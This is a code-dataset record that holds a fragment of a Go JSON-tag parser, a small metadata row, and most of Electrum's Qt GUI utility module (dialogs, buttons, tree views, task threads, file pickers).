if scp.program != nil {
if scp.program.Fset != nil {
pos = scp.program.Fset.Position(fld.Pos()).String()
}
}
}
return fmt.Errorf("Expr (%s) is unsupported for a schema", pos)
}
return nil
}
func parseJSONTag(field *ast.Field) (name string, ignore bool, err error) {
if len(field.Names) > 0 {
name = field.Names[0].Name
}
if field.Tag != nil && len(strings.TrimSpace(field.Tag.Value)) > 0 {
tv, err := strconv.Unquote(field.Tag.Value)
if err != nil {
return name, false, err
}
if strings.TrimSpace(tv) != "" {
st := reflect.StructTag(tv)
jsonName := strings.Split(st.Get("json"), ",")[0]
if jsonName == "-" {
return name, true, nil
} else if jsonName != "" {
return jsonName, false, nil
}
}
}
return name, false, nil
}
|
[
"\"GOPATH\"",
"\"HOME\""
] |
[] |
[
"GOPATH",
"HOME"
] |
[]
|
["GOPATH", "HOME"]
|
go
| 2 | 0 | |
electrum/gui/qt/util.py
|
import asyncio
import os.path
import time
import sys
import platform
import queue
import traceback
import os
import webbrowser
from decimal import Decimal
from functools import partial, lru_cache
from typing import (NamedTuple, Callable, Optional, TYPE_CHECKING, Union, List, Dict, Any,
Sequence, Iterable)
from PyQt5.QtGui import (QFont, QColor, QCursor, QPixmap, QStandardItem, QImage,
QPalette, QIcon, QFontMetrics, QShowEvent, QPainter, QHelpEvent)
from PyQt5.QtCore import (Qt, QPersistentModelIndex, QModelIndex, pyqtSignal,
QCoreApplication, QItemSelectionModel, QThread,
QSortFilterProxyModel, QSize, QLocale, QAbstractItemModel,
QEvent, QRect, QPoint, QObject)
from PyQt5.QtWidgets import (QPushButton, QLabel, QMessageBox, QHBoxLayout,
QAbstractItemView, QVBoxLayout, QLineEdit,
QStyle, QDialog, QGroupBox, QButtonGroup, QRadioButton,
QFileDialog, QWidget, QToolButton, QTreeView, QPlainTextEdit,
QHeaderView, QApplication, QToolTip, QTreeWidget, QStyledItemDelegate,
QMenu, QStyleOptionViewItem, QLayout, QLayoutItem,
QGraphicsEffect, QGraphicsScene, QGraphicsPixmapItem)
from electrum.i18n import _, languages
from electrum.util import FileImportFailed, FileExportFailed, make_aiohttp_session, resource_path
from electrum.invoices import PR_UNPAID, PR_PAID, PR_EXPIRED, PR_INFLIGHT, PR_UNKNOWN, PR_FAILED, PR_ROUTING, PR_UNCONFIRMED
if TYPE_CHECKING:
from .main_window import ElectrumWindow
from .installwizard import InstallWizard
from electrum.simple_config import SimpleConfig
if platform.system() == 'Windows':
MONOSPACE_FONT = 'Lucida Console'
elif platform.system() == 'Darwin':
MONOSPACE_FONT = 'Monaco'
else:
MONOSPACE_FONT = 'monospace'
dialogs = []
pr_icons = {
PR_UNKNOWN:"warning.png",
PR_UNPAID:"unpaid.png",
PR_PAID:"confirmed.png",
PR_EXPIRED:"expired.png",
PR_INFLIGHT:"unconfirmed.png",
PR_FAILED:"warning.png",
PR_ROUTING:"unconfirmed.png",
PR_UNCONFIRMED:"unconfirmed.png",
}
# filter tx files in QFileDialog:
TRANSACTION_FILE_EXTENSION_FILTER_ANY = "Transaction (*.txn *.psbt);;All files (*)"
TRANSACTION_FILE_EXTENSION_FILTER_ONLY_PARTIAL_TX = "Partial Transaction (*.psbt)"
TRANSACTION_FILE_EXTENSION_FILTER_ONLY_COMPLETE_TX = "Complete Transaction (*.txn)"
TRANSACTION_FILE_EXTENSION_FILTER_SEPARATE = (f"{TRANSACTION_FILE_EXTENSION_FILTER_ONLY_PARTIAL_TX};;"
f"{TRANSACTION_FILE_EXTENSION_FILTER_ONLY_COMPLETE_TX};;"
f"All files (*)")
class EnterButton(QPushButton):
def __init__(self, text, func):
QPushButton.__init__(self, text)
self.func = func
self.clicked.connect(func)
def keyPressEvent(self, e):
if e.key() in [Qt.Key_Return, Qt.Key_Enter]:
self.func()
class ThreadedButton(QPushButton):
def __init__(self, text, task, on_success=None, on_error=None):
QPushButton.__init__(self, text)
self.task = task
self.on_success = on_success
self.on_error = on_error
self.clicked.connect(self.run_task)
def run_task(self):
self.setEnabled(False)
self.thread = TaskThread(self)
self.thread.add(self.task, self.on_success, self.done, self.on_error)
def done(self):
self.setEnabled(True)
self.thread.stop()
class WWLabel(QLabel):
def __init__ (self, text="", parent=None):
QLabel.__init__(self, text, parent)
self.setWordWrap(True)
self.setTextInteractionFlags(Qt.TextSelectableByMouse)
class HelpLabel(QLabel):
def __init__(self, text, help_text):
QLabel.__init__(self, text)
self.help_text = help_text
self.app = QCoreApplication.instance()
self.font = QFont()
def mouseReleaseEvent(self, x):
custom_message_box(icon=QMessageBox.Information,
parent=self,
title=_('Help'),
text=self.help_text)
def enterEvent(self, event):
self.font.setUnderline(True)
self.setFont(self.font)
self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
return QLabel.enterEvent(self, event)
def leaveEvent(self, event):
self.font.setUnderline(False)
self.setFont(self.font)
self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
return QLabel.leaveEvent(self, event)
class HelpButton(QToolButton):
def __init__(self, text):
QToolButton.__init__(self)
self.setText('?')
self.help_text = text
self.setFocusPolicy(Qt.NoFocus)
self.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.clicked.connect(self.onclick)
def onclick(self):
custom_message_box(icon=QMessageBox.Information,
parent=self,
title=_('Help'),
text=self.help_text,
rich_text=True)
class InfoButton(QPushButton):
def __init__(self, text):
QPushButton.__init__(self, 'Info')
self.help_text = text
self.setFocusPolicy(Qt.NoFocus)
self.setFixedWidth(6 * char_width_in_lineedit())
self.clicked.connect(self.onclick)
def onclick(self):
custom_message_box(icon=QMessageBox.Information,
parent=self,
title=_('Info'),
text=self.help_text,
rich_text=True)
class Buttons(QHBoxLayout):
def __init__(self, *buttons):
QHBoxLayout.__init__(self)
self.addStretch(1)
for b in buttons:
if b is None:
continue
self.addWidget(b)
class CloseButton(QPushButton):
def __init__(self, dialog):
QPushButton.__init__(self, _("Close"))
self.clicked.connect(dialog.close)
self.setDefault(True)
class CopyButton(QPushButton):
def __init__(self, text_getter, app):
QPushButton.__init__(self, _("Copy"))
self.clicked.connect(lambda: app.clipboard().setText(text_getter()))
class CopyCloseButton(QPushButton):
def __init__(self, text_getter, app, dialog):
QPushButton.__init__(self, _("Copy and Close"))
self.clicked.connect(lambda: app.clipboard().setText(text_getter()))
self.clicked.connect(dialog.close)
self.setDefault(True)
class OkButton(QPushButton):
def __init__(self, dialog, label=None):
QPushButton.__init__(self, label or _("OK"))
self.clicked.connect(dialog.accept)
self.setDefault(True)
class CancelButton(QPushButton):
def __init__(self, dialog, label=None):
QPushButton.__init__(self, label or _("Cancel"))
self.clicked.connect(dialog.reject)
class MessageBoxMixin(object):
def top_level_window_recurse(self, window=None, test_func=None):
window = window or self
classes = (WindowModalDialog, QMessageBox)
if test_func is None:
test_func = lambda x: True
for n, child in enumerate(window.children()):
# Test for visibility as old closed dialogs may not be GC-ed.
# Only accept children that conform to test_func.
if isinstance(child, classes) and child.isVisible() \
and test_func(child):
return self.top_level_window_recurse(child, test_func=test_func)
return window
def top_level_window(self, test_func=None):
return self.top_level_window_recurse(test_func)
def question(self, msg, parent=None, title=None, icon=None, **kwargs) -> bool:
Yes, No = QMessageBox.Yes, QMessageBox.No
return Yes == self.msg_box(icon=icon or QMessageBox.Question,
parent=parent,
title=title or '',
text=msg,
buttons=Yes|No,
defaultButton=No,
**kwargs)
def show_warning(self, msg, parent=None, title=None, **kwargs):
return self.msg_box(QMessageBox.Warning, parent,
title or _('Warning'), msg, **kwargs)
def show_error(self, msg, parent=None, **kwargs):
return self.msg_box(QMessageBox.Warning, parent,
_('Error'), msg, **kwargs)
def show_critical(self, msg, parent=None, title=None, **kwargs):
return self.msg_box(QMessageBox.Critical, parent,
title or _('Critical Error'), msg, **kwargs)
def show_message(self, msg, parent=None, title=None, **kwargs):
return self.msg_box(QMessageBox.Information, parent,
title or _('Information'), msg, **kwargs)
def msg_box(self, icon, parent, title, text, *, buttons=QMessageBox.Ok,
defaultButton=QMessageBox.NoButton, rich_text=False,
checkbox=None):
parent = parent or self.top_level_window()
return custom_message_box(icon=icon,
parent=parent,
title=title,
text=text,
buttons=buttons,
defaultButton=defaultButton,
rich_text=rich_text,
checkbox=checkbox)
def custom_message_box(*, icon, parent, title, text, buttons=QMessageBox.Ok,
defaultButton=QMessageBox.NoButton, rich_text=False,
checkbox=None):
if type(icon) is QPixmap:
d = QMessageBox(QMessageBox.Information, title, str(text), buttons, parent)
d.setIconPixmap(icon)
else:
d = QMessageBox(icon, title, str(text), buttons, parent)
d.setWindowModality(Qt.WindowModal)
d.setDefaultButton(defaultButton)
if rich_text:
d.setTextInteractionFlags(Qt.TextSelectableByMouse | Qt.LinksAccessibleByMouse)
# set AutoText instead of RichText
# AutoText lets Qt figure out whether to render as rich text.
# e.g. if text is actually plain text and uses "\n" newlines;
# and we set RichText here, newlines would be swallowed
d.setTextFormat(Qt.AutoText)
else:
d.setTextInteractionFlags(Qt.TextSelectableByMouse)
d.setTextFormat(Qt.PlainText)
if checkbox is not None:
d.setCheckBox(checkbox)
return d.exec_()
class WindowModalDialog(QDialog, MessageBoxMixin):
'''Handy wrapper; window modal dialogs are better for our multi-window
daemon model as other wallet windows can still be accessed.'''
def __init__(self, parent, title=None):
QDialog.__init__(self, parent)
self.setWindowModality(Qt.WindowModal)
if title:
self.setWindowTitle(title)
class WaitingDialog(WindowModalDialog):
'''Shows a please wait dialog whilst running a task. It is not
necessary to maintain a reference to this dialog.'''
def __init__(self, parent: QWidget, message: str, task, on_success=None, on_error=None):
assert parent
if isinstance(parent, MessageBoxMixin):
parent = parent.top_level_window()
WindowModalDialog.__init__(self, parent, _("Please wait"))
self.message_label = QLabel(message)
vbox = QVBoxLayout(self)
vbox.addWidget(self.message_label)
self.accepted.connect(self.on_accepted)
self.show()
self.thread = TaskThread(self)
self.thread.finished.connect(self.deleteLater) # see #3956
self.thread.add(task, on_success, self.accept, on_error)
def wait(self):
self.thread.wait()
def on_accepted(self):
self.thread.stop()
def update(self, msg):
print(msg)
self.message_label.setText(msg)
class BlockingWaitingDialog(WindowModalDialog):
"""Shows a waiting dialog whilst running a task.
Should be called from the GUI thread. The GUI thread will be blocked while
the task is running; the point of the dialog is to provide feedback
to the user regarding what is going on.
"""
def __init__(self, parent: QWidget, message: str, task: Callable[[], Any]):
assert parent
if isinstance(parent, MessageBoxMixin):
parent = parent.top_level_window()
WindowModalDialog.__init__(self, parent, _("Please wait"))
self.message_label = QLabel(message)
vbox = QVBoxLayout(self)
vbox.addWidget(self.message_label)
# show popup
self.show()
# refresh GUI; needed for popup to appear and for message_label to get drawn
QCoreApplication.processEvents()
QCoreApplication.processEvents()
# block and run given task
task()
# close popup
self.accept()
def line_dialog(parent, title, label, ok_label, default=None):
dialog = WindowModalDialog(parent, title)
dialog.setMinimumWidth(500)
l = QVBoxLayout()
dialog.setLayout(l)
l.addWidget(QLabel(label))
txt = QLineEdit()
if default:
txt.setText(default)
l.addWidget(txt)
l.addLayout(Buttons(CancelButton(dialog), OkButton(dialog, ok_label)))
if dialog.exec_():
return txt.text()
def text_dialog(
*,
parent,
title,
header_layout,
ok_label,
default=None,
allow_multi=False,
config: 'SimpleConfig',
):
from .qrtextedit import ScanQRTextEdit
dialog = WindowModalDialog(parent, title)
dialog.setMinimumWidth(600)
l = QVBoxLayout()
dialog.setLayout(l)
if isinstance(header_layout, str):
l.addWidget(QLabel(header_layout))
else:
l.addLayout(header_layout)
txt = ScanQRTextEdit(allow_multi=allow_multi, config=config)
if default:
txt.setText(default)
l.addWidget(txt)
l.addLayout(Buttons(CancelButton(dialog), OkButton(dialog, ok_label)))
if dialog.exec_():
return txt.toPlainText()
class ChoicesLayout(object):
def __init__(self, msg, choices, on_clicked=None, checked_index=0):
vbox = QVBoxLayout()
if len(msg) > 50:
vbox.addWidget(WWLabel(msg))
msg = ""
gb2 = QGroupBox(msg)
vbox.addWidget(gb2)
vbox2 = QVBoxLayout()
gb2.setLayout(vbox2)
self.group = group = QButtonGroup()
for i,c in enumerate(choices):
button = QRadioButton(gb2)
button.setText(c)
vbox2.addWidget(button)
group.addButton(button)
group.setId(button, i)
if i==checked_index:
button.setChecked(True)
if on_clicked:
group.buttonClicked.connect(partial(on_clicked, self))
self.vbox = vbox
def layout(self):
return self.vbox
def selected_index(self):
return self.group.checkedId()
def address_field(addresses):
hbox = QHBoxLayout()
address_e = QLineEdit()
if addresses and len(addresses) > 0:
address_e.setText(addresses[0])
else:
addresses = []
def func():
try:
i = addresses.index(str(address_e.text())) + 1
i = i % len(addresses)
address_e.setText(addresses[i])
except ValueError:
# the user might have changed address_e to an
# address not in the wallet (or to something that isn't an address)
if addresses and len(addresses) > 0:
address_e.setText(addresses[0])
button = QPushButton(_('Address'))
button.clicked.connect(func)
hbox.addWidget(button)
hbox.addWidget(address_e)
return hbox, address_e
def filename_field(parent, config, defaultname, select_msg):
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Format")))
gb = QGroupBox("format", parent)
b1 = QRadioButton(gb)
b1.setText(_("CSV"))
b1.setChecked(True)
b2 = QRadioButton(gb)
b2.setText(_("json"))
vbox.addWidget(b1)
vbox.addWidget(b2)
hbox = QHBoxLayout()
directory = config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, defaultname)
filename_e = QLineEdit()
filename_e.setText(path)
def func():
text = filename_e.text()
_filter = "*.csv" if defaultname.endswith(".csv") else "*.json" if defaultname.endswith(".json") else None
p = getSaveFileName(
parent=None,
title=select_msg,
filename=text,
filter=_filter,
config=config,
)
if p:
filename_e.setText(p)
button = QPushButton(_('File'))
button.clicked.connect(func)
hbox.addWidget(button)
hbox.addWidget(filename_e)
vbox.addLayout(hbox)
def set_csv(v):
text = filename_e.text()
text = text.replace(".json",".csv") if v else text.replace(".csv",".json")
filename_e.setText(text)
b1.clicked.connect(lambda: set_csv(True))
b2.clicked.connect(lambda: set_csv(False))
return vbox, filename_e, b1
class ElectrumItemDelegate(QStyledItemDelegate):
def __init__(self, tv: 'MyTreeView'):
super().__init__(tv)
self.tv = tv
self.opened = None
def on_closeEditor(editor: QLineEdit, hint):
self.opened = None
self.tv.is_editor_open = False
if self.tv._pending_update:
self.tv.update()
def on_commitData(editor: QLineEdit):
new_text = editor.text()
idx = QModelIndex(self.opened)
row, col = idx.row(), idx.column()
edit_key = self.tv.get_edit_key_from_coordinate(row, col)
assert edit_key is not None, (idx.row(), idx.column())
self.tv.on_edited(idx, edit_key=edit_key, text=new_text)
self.closeEditor.connect(on_closeEditor)
self.commitData.connect(on_commitData)
def createEditor(self, parent, option, idx):
self.opened = QPersistentModelIndex(idx)
self.tv.is_editor_open = True
return super().createEditor(parent, option, idx)
def paint(self, painter: QPainter, option: QStyleOptionViewItem, idx: QModelIndex) -> None:
custom_data = idx.data(MyTreeView.ROLE_CUSTOM_PAINT)
if custom_data is None:
return super().paint(painter, option, idx)
else:
# let's call the default paint method first; to paint the background (e.g. selection)
super().paint(painter, option, idx)
# and now paint on top of that
custom_data.paint(painter, option.rect)
def helpEvent(self, evt: QHelpEvent, view: QAbstractItemView, option: QStyleOptionViewItem, idx: QModelIndex) -> bool:
custom_data = idx.data(MyTreeView.ROLE_CUSTOM_PAINT)
if custom_data is None:
return super().helpEvent(evt, view, option, idx)
else:
if evt.type() == QEvent.ToolTip:
if custom_data.show_tooltip(evt):
return True
return super().helpEvent(evt, view, option, idx)
def sizeHint(self, option: QStyleOptionViewItem, idx: QModelIndex) -> QSize:
custom_data = idx.data(MyTreeView.ROLE_CUSTOM_PAINT)
if custom_data is None:
return super().sizeHint(option, idx)
else:
default_size = super().sizeHint(option, idx)
return custom_data.sizeHint(default_size)
class MyTreeView(QTreeView):
ROLE_CLIPBOARD_DATA = Qt.UserRole + 100
ROLE_CUSTOM_PAINT = Qt.UserRole + 101
ROLE_EDIT_KEY = Qt.UserRole + 102
ROLE_FILTER_DATA = Qt.UserRole + 103
filter_columns: Iterable[int]
def __init__(self, parent: 'ElectrumWindow', create_menu, *,
stretch_column=None, editable_columns=None):
super().__init__(parent)
self.parent = parent
self.config = self.parent.config
self.stretch_column = stretch_column
self.setContextMenuPolicy(Qt.CustomContextMenu)
self.customContextMenuRequested.connect(create_menu)
self.setUniformRowHeights(True)
# Control which columns are editable
if editable_columns is None:
editable_columns = []
self.editable_columns = set(editable_columns)
self.setItemDelegate(ElectrumItemDelegate(self))
self.current_filter = ""
self.is_editor_open = False
self.setRootIsDecorated(False) # remove left margin
self.toolbar_shown = False
# When figuring out the size of columns, Qt by default looks at
# the first 1000 rows (at least if resize mode is QHeaderView.ResizeToContents).
# This would be REALLY SLOW, and it's not perfect anyway.
# So to speed the UI up considerably, set it to
# only look at as many rows as currently visible.
self.header().setResizeContentsPrecision(0)
self._pending_update = False
self._forced_update = False
def set_editability(self, items):
for idx, i in enumerate(items):
i.setEditable(idx in self.editable_columns)
def selected_in_column(self, column: int):
items = self.selectionModel().selectedIndexes()
return list(x for x in items if x.column() == column)
def get_role_data_for_current_item(self, *, col, role) -> Any:
idx = self.selectionModel().currentIndex()
idx = idx.sibling(idx.row(), col)
item = self.item_from_index(idx)
if item:
return item.data(role)
def item_from_index(self, idx: QModelIndex) -> Optional[QStandardItem]:
model = self.model()
if isinstance(model, QSortFilterProxyModel):
idx = model.mapToSource(idx)
return model.sourceModel().itemFromIndex(idx)
else:
return model.itemFromIndex(idx)
def original_model(self) -> QAbstractItemModel:
model = self.model()
if isinstance(model, QSortFilterProxyModel):
return model.sourceModel()
else:
return model
def set_current_idx(self, set_current: QPersistentModelIndex):
if set_current:
assert isinstance(set_current, QPersistentModelIndex)
assert set_current.isValid()
self.selectionModel().select(QModelIndex(set_current), QItemSelectionModel.SelectCurrent)
def update_headers(self, headers: Union[List[str], Dict[int, str]]):
# headers is either a list of column names, or a dict: (col_idx->col_name)
if not isinstance(headers, dict): # convert to dict
headers = dict(enumerate(headers))
col_names = [headers[col_idx] for col_idx in sorted(headers.keys())]
self.original_model().setHorizontalHeaderLabels(col_names)
self.header().setStretchLastSection(False)
for col_idx in headers:
sm = QHeaderView.Stretch if col_idx == self.stretch_column else QHeaderView.ResizeToContents
self.header().setSectionResizeMode(col_idx, sm)
def keyPressEvent(self, event):
if self.itemDelegate().opened:
return
if event.key() in [Qt.Key_F2, Qt.Key_Return, Qt.Key_Enter]:
self.on_activated(self.selectionModel().currentIndex())
return
super().keyPressEvent(event)
def on_activated(self, idx):
# on 'enter' we show the menu
pt = self.visualRect(idx).bottomLeft()
pt.setX(50)
self.customContextMenuRequested.emit(pt)
def edit(self, idx, trigger=QAbstractItemView.AllEditTriggers, event=None):
"""
this is to prevent:
edit: editing failed
from inside qt
"""
return super().edit(idx, trigger, event)
def on_edited(self, idx: QModelIndex, edit_key, *, text: str) -> None:
raise NotImplementedError()
def should_hide(self, row):
"""
row_num is for self.model(). So if there is a proxy, it is the row number
in that!
"""
return False
def get_text_from_coordinate(self, row, col) -> str:
idx = self.model().index(row, col)
item = self.item_from_index(idx)
return item.text()
def get_role_data_from_coordinate(self, row, col, *, role) -> Any:
idx = self.model().index(row, col)
item = self.item_from_index(idx)
role_data = item.data(role)
return role_data
def get_edit_key_from_coordinate(self, row, col) -> Any:
# overriding this might allow avoiding storing duplicate data
return self.get_role_data_from_coordinate(row, col, role=self.ROLE_EDIT_KEY)
def get_filter_data_from_coordinate(self, row, col) -> str:
filter_data = self.get_role_data_from_coordinate(row, col, role=self.ROLE_FILTER_DATA)
if filter_data:
return filter_data
txt = self.get_text_from_coordinate(row, col)
txt = txt.lower()
return txt
def hide_row(self, row_num):
"""
row_num is for self.model(). So if there is a proxy, it is the row number
in that!
"""
should_hide = self.should_hide(row_num)
if not self.current_filter and should_hide is None:
# no filters at all, neither date nor search
self.setRowHidden(row_num, QModelIndex(), False)
return
for column in self.filter_columns:
filter_data = self.get_filter_data_from_coordinate(row_num, column)
if self.current_filter in filter_data:
# the filter matched, but the date filter might apply
self.setRowHidden(row_num, QModelIndex(), bool(should_hide))
break
else:
# we did not find the filter in any columns, hide the item
self.setRowHidden(row_num, QModelIndex(), True)
def filter(self, p=None):
if p is not None:
p = p.lower()
self.current_filter = p
self.hide_rows()
def hide_rows(self):
for row in range(self.model().rowCount()):
self.hide_row(row)
def create_toolbar(self, config=None):
hbox = QHBoxLayout()
buttons = self.get_toolbar_buttons()
for b in buttons:
b.setVisible(False)
hbox.addWidget(b)
hide_button = QPushButton('x')
hide_button.setVisible(False)
hide_button.pressed.connect(lambda: self.show_toolbar(False, config))
self.toolbar_buttons = buttons + (hide_button,)
hbox.addStretch()
hbox.addWidget(hide_button)
return hbox
def save_toolbar_state(self, state, config):
pass # implemented in subclasses
def show_toolbar(self, state, config=None):
if state == self.toolbar_shown:
return
self.toolbar_shown = state
if config:
self.save_toolbar_state(state, config)
for b in self.toolbar_buttons:
b.setVisible(state)
if not state:
self.on_hide_toolbar()
def toggle_toolbar(self, config=None):
self.show_toolbar(not self.toolbar_shown, config)
def add_copy_menu(self, menu: QMenu, idx) -> QMenu:
cc = menu.addMenu(_("Copy"))
for column in self.Columns:
column_title = self.original_model().horizontalHeaderItem(column).text()
if not column_title:
continue
item_col = self.item_from_index(idx.sibling(idx.row(), column))
clipboard_data = item_col.data(self.ROLE_CLIPBOARD_DATA)
if clipboard_data is None:
clipboard_data = item_col.text().strip()
cc.addAction(column_title,
lambda text=clipboard_data, title=column_title:
self.place_text_on_clipboard(text, title=title))
return cc
def place_text_on_clipboard(self, text: str, *, title: str = None) -> None:
self.parent.do_copy(text, title=title)
def showEvent(self, e: 'QShowEvent'):
super().showEvent(e)
if e.isAccepted() and self._pending_update:
self._forced_update = True
self.update()
self._forced_update = False
def maybe_defer_update(self) -> bool:
"""Returns whether we should defer an update/refresh."""
defer = (not self._forced_update
and (not self.isVisible() or self.is_editor_open))
# side-effect: if we decide to defer update, the state will become stale:
self._pending_update = defer
return defer
class MySortModel(QSortFilterProxyModel):
def __init__(self, parent, *, sort_role):
super().__init__(parent)
self._sort_role = sort_role
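# Sort by the dedicated sort role when both items carry it; otherwise try a numeric (Decimal)
# comparison of the display text before falling back to plain string comparison.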
def lessThan(self, source_left: QModelIndex, source_right: QModelIndex):
item1 = self.sourceModel().itemFromIndex(source_left)
item2 = self.sourceModel().itemFromIndex(source_right)
data1 = item1.data(self._sort_role)
data2 = item2.data(self._sort_role)
if data1 is not None and data2 is not None:
return data1 < data2
v1 = item1.text()
v2 = item2.text()
try:
return Decimal(v1) < Decimal(v2)
except:
return v1 < v2
class ButtonsWidget(QWidget):
def __init__(self):
super(QWidget, self).__init__()
self.buttons = [] # type: List[QToolButton]
def resizeButtons(self):
frameWidth = self.style().pixelMetric(QStyle.PM_DefaultFrameWidth)
x = self.rect().right() - frameWidth - 10
y = self.rect().bottom() - frameWidth
for button in self.buttons:
sz = button.sizeHint()
x -= sz.width()
button.move(x, y - sz.height())
def addButton(self, icon_name, on_click, tooltip):
button = QToolButton(self)
button.setIcon(read_QIcon(icon_name))
button.setIconSize(QSize(25,25))
button.setCursor(QCursor(Qt.PointingHandCursor))
button.setStyleSheet("QToolButton { border: none; hover {border: 1px} pressed {border: 1px} padding: 0px; }")
button.setVisible(True)
button.setToolTip(tooltip)
button.clicked.connect(on_click)
self.buttons.append(button)
return button
def addCopyButton(self, app):
self.app = app
self.addButton("copy.png", self.on_copy, _("Copy to clipboard"))
def on_copy(self):
self.app.clipboard().setText(self.text())
QToolTip.showText(QCursor.pos(), _("Text copied to clipboard"), self)
def addPasteButton(self, app):
self.app = app
self.addButton("copy.png", self.on_paste, _("Paste from clipboard"))
def on_paste(self):
self.setText(self.app.clipboard().text())
class ButtonsLineEdit(QLineEdit, ButtonsWidget):
def __init__(self, text=None):
QLineEdit.__init__(self, text)
self.buttons = []
def resizeEvent(self, e):
o = QLineEdit.resizeEvent(self, e)
self.resizeButtons()
return o
class ButtonsTextEdit(QPlainTextEdit, ButtonsWidget):
def __init__(self, text=None):
QPlainTextEdit.__init__(self, text)
self.setText = self.setPlainText
self.text = self.toPlainText
self.buttons = []
def resizeEvent(self, e):
o = QPlainTextEdit.resizeEvent(self, e)
self.resizeButtons()
return o
class PasswordLineEdit(QLineEdit):
def __init__(self, *args, **kwargs):
QLineEdit.__init__(self, *args, **kwargs)
self.setEchoMode(QLineEdit.Password)
def clear(self):
# Try to actually overwrite the memory.
# This is really just a best-effort thing...
self.setText(len(self.text()) * " ")
super().clear()
class TaskThread(QThread):
'''Thread that runs background tasks. Callbacks are guaranteed
to happen in the context of its parent.'''
class Task(NamedTuple):
task: Callable
cb_success: Optional[Callable]
cb_done: Optional[Callable]
cb_error: Optional[Callable]
doneSig = pyqtSignal(object, object, object)
def __init__(self, parent, on_error=None):
super(TaskThread, self).__init__(parent)
self.on_error = on_error
self.tasks = queue.Queue()
self.doneSig.connect(self.on_done)
self.start()
def add(self, task, on_success=None, on_done=None, on_error=None):
on_error = on_error or self.on_error
self.tasks.put(TaskThread.Task(task, on_success, on_done, on_error))
def run(self):
while True:
task = self.tasks.get() # type: TaskThread.Task
if not task:
break
try:
result = task.task()
self.doneSig.emit(result, task.cb_done, task.cb_success)
except BaseException:
self.doneSig.emit(sys.exc_info(), task.cb_done, task.cb_error)
def on_done(self, result, cb_done, cb_result):
# This runs in the parent's thread.
if cb_done:
cb_done()
if cb_result:
cb_result(result)
def stop(self):
self.tasks.put(None)
self.exit()
self.wait()
class ColorSchemeItem:
def __init__(self, fg_color, bg_color):
self.colors = (fg_color, bg_color)
def _get_color(self, background):
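# The pair is stored as (foreground, background); on a dark scheme the index flips so the
# chosen color stays readable against the inverted palette.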
return self.colors[(int(background) + int(ColorScheme.dark_scheme)) % 2]
def as_stylesheet(self, background=False):
css_prefix = "background-" if background else ""
color = self._get_color(background)
return "QWidget {{ {}color:{}; }}".format(css_prefix, color)
def as_color(self, background=False):
color = self._get_color(background)
return QColor(color)
class ColorScheme:
dark_scheme = False
GREEN = ColorSchemeItem("#117c11", "#8af296")
YELLOW = ColorSchemeItem("#897b2a", "#ffff00")
RED = ColorSchemeItem("#7c1111", "#f18c8c")
BLUE = ColorSchemeItem("#123b7c", "#8cb3f2")
DEFAULT = ColorSchemeItem("black", "white")
GRAY = ColorSchemeItem("gray", "gray")
@staticmethod
def has_dark_background(widget):
brightness = sum(widget.palette().color(QPalette.Background).getRgb()[0:3])
return brightness < (255*3/2)
@staticmethod
def update_from_widget(widget, force_dark=False):
if force_dark or ColorScheme.has_dark_background(widget):
ColorScheme.dark_scheme = True
class AcceptFileDragDrop:
def __init__(self, file_type=""):
assert isinstance(self, QWidget)
self.setAcceptDrops(True)
self.file_type = file_type
def validateEvent(self, event):
if not event.mimeData().hasUrls():
event.ignore()
return False
for url in event.mimeData().urls():
if not url.toLocalFile().endswith(self.file_type):
event.ignore()
return False
event.accept()
return True
def dragEnterEvent(self, event):
self.validateEvent(event)
def dragMoveEvent(self, event):
if self.validateEvent(event):
event.setDropAction(Qt.CopyAction)
def dropEvent(self, event):
if self.validateEvent(event):
for url in event.mimeData().urls():
self.onFileAdded(url.toLocalFile())
def onFileAdded(self, fn):
raise NotImplementedError()
def import_meta_gui(electrum_window: 'ElectrumWindow', title, importer, on_success):
filter_ = "JSON (*.json);;All files (*)"
filename = getOpenFileName(
parent=electrum_window,
title=_("Open {} file").format(title),
filter=filter_,
config=electrum_window.config,
)
if not filename:
return
try:
importer(filename)
except FileImportFailed as e:
electrum_window.show_critical(str(e))
else:
electrum_window.show_message(_("Your {} were successfully imported").format(title))
on_success()
def export_meta_gui(electrum_window: 'ElectrumWindow', title, exporter):
filter_ = "JSON (*.json);;All files (*)"
filename = getSaveFileName(
parent=electrum_window,
title=_("Select file to save your {}").format(title),
filename='electrum_{}.json'.format(title),
filter=filter_,
config=electrum_window.config,
)
if not filename:
return
try:
exporter(filename)
except FileExportFailed as e:
electrum_window.show_critical(str(e))
else:
electrum_window.show_message(_("Your {0} were exported to '{1}'")
.format(title, str(filename)))
def getOpenFileName(*, parent, title, filter="", config: 'SimpleConfig') -> Optional[str]:
"""Custom wrapper for getOpenFileName that remembers the path selected by the user."""
directory = config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(parent, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(
*,
parent,
title,
filename,
filter="",
default_extension: str = None,
default_filter: str = None,
config: 'SimpleConfig',
) -> Optional[str]:
"""Custom wrapper for getSaveFileName that remembers the path selected by the user."""
directory = config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, filename)
file_dialog = QFileDialog(parent, title, path, filter)
file_dialog.setAcceptMode(QFileDialog.AcceptSave)
if default_extension:
# note: on MacOS, the selected filter's first extension seems to have priority over this...
file_dialog.setDefaultSuffix(default_extension)
if default_filter:
assert default_filter in filter, f"default_filter={default_filter!r} does not appear in filter={filter!r}"
file_dialog.selectNameFilter(default_filter)
if file_dialog.exec() != QDialog.Accepted:
return None
selected_path = file_dialog.selectedFiles()[0]
if selected_path and directory != os.path.dirname(selected_path):
config.set_key('io_dir', os.path.dirname(selected_path), True)
return selected_path
def icon_path(icon_basename):
return resource_path('gui', 'icons', icon_basename)
@lru_cache(maxsize=1000)
def read_QIcon(icon_basename):
return QIcon(icon_path(icon_basename))
class IconLabel(QWidget):
IconSize = QSize(16, 16)
HorizontalSpacing = 2
def __init__(self, *, text='', final_stretch=True):
super(QWidget, self).__init__()
layout = QHBoxLayout()
layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(layout)
self.icon = QLabel()
self.label = QLabel(text)
self.label.setTextInteractionFlags(Qt.TextSelectableByMouse)
layout.addWidget(self.label)
layout.addSpacing(self.HorizontalSpacing)
layout.addWidget(self.icon)
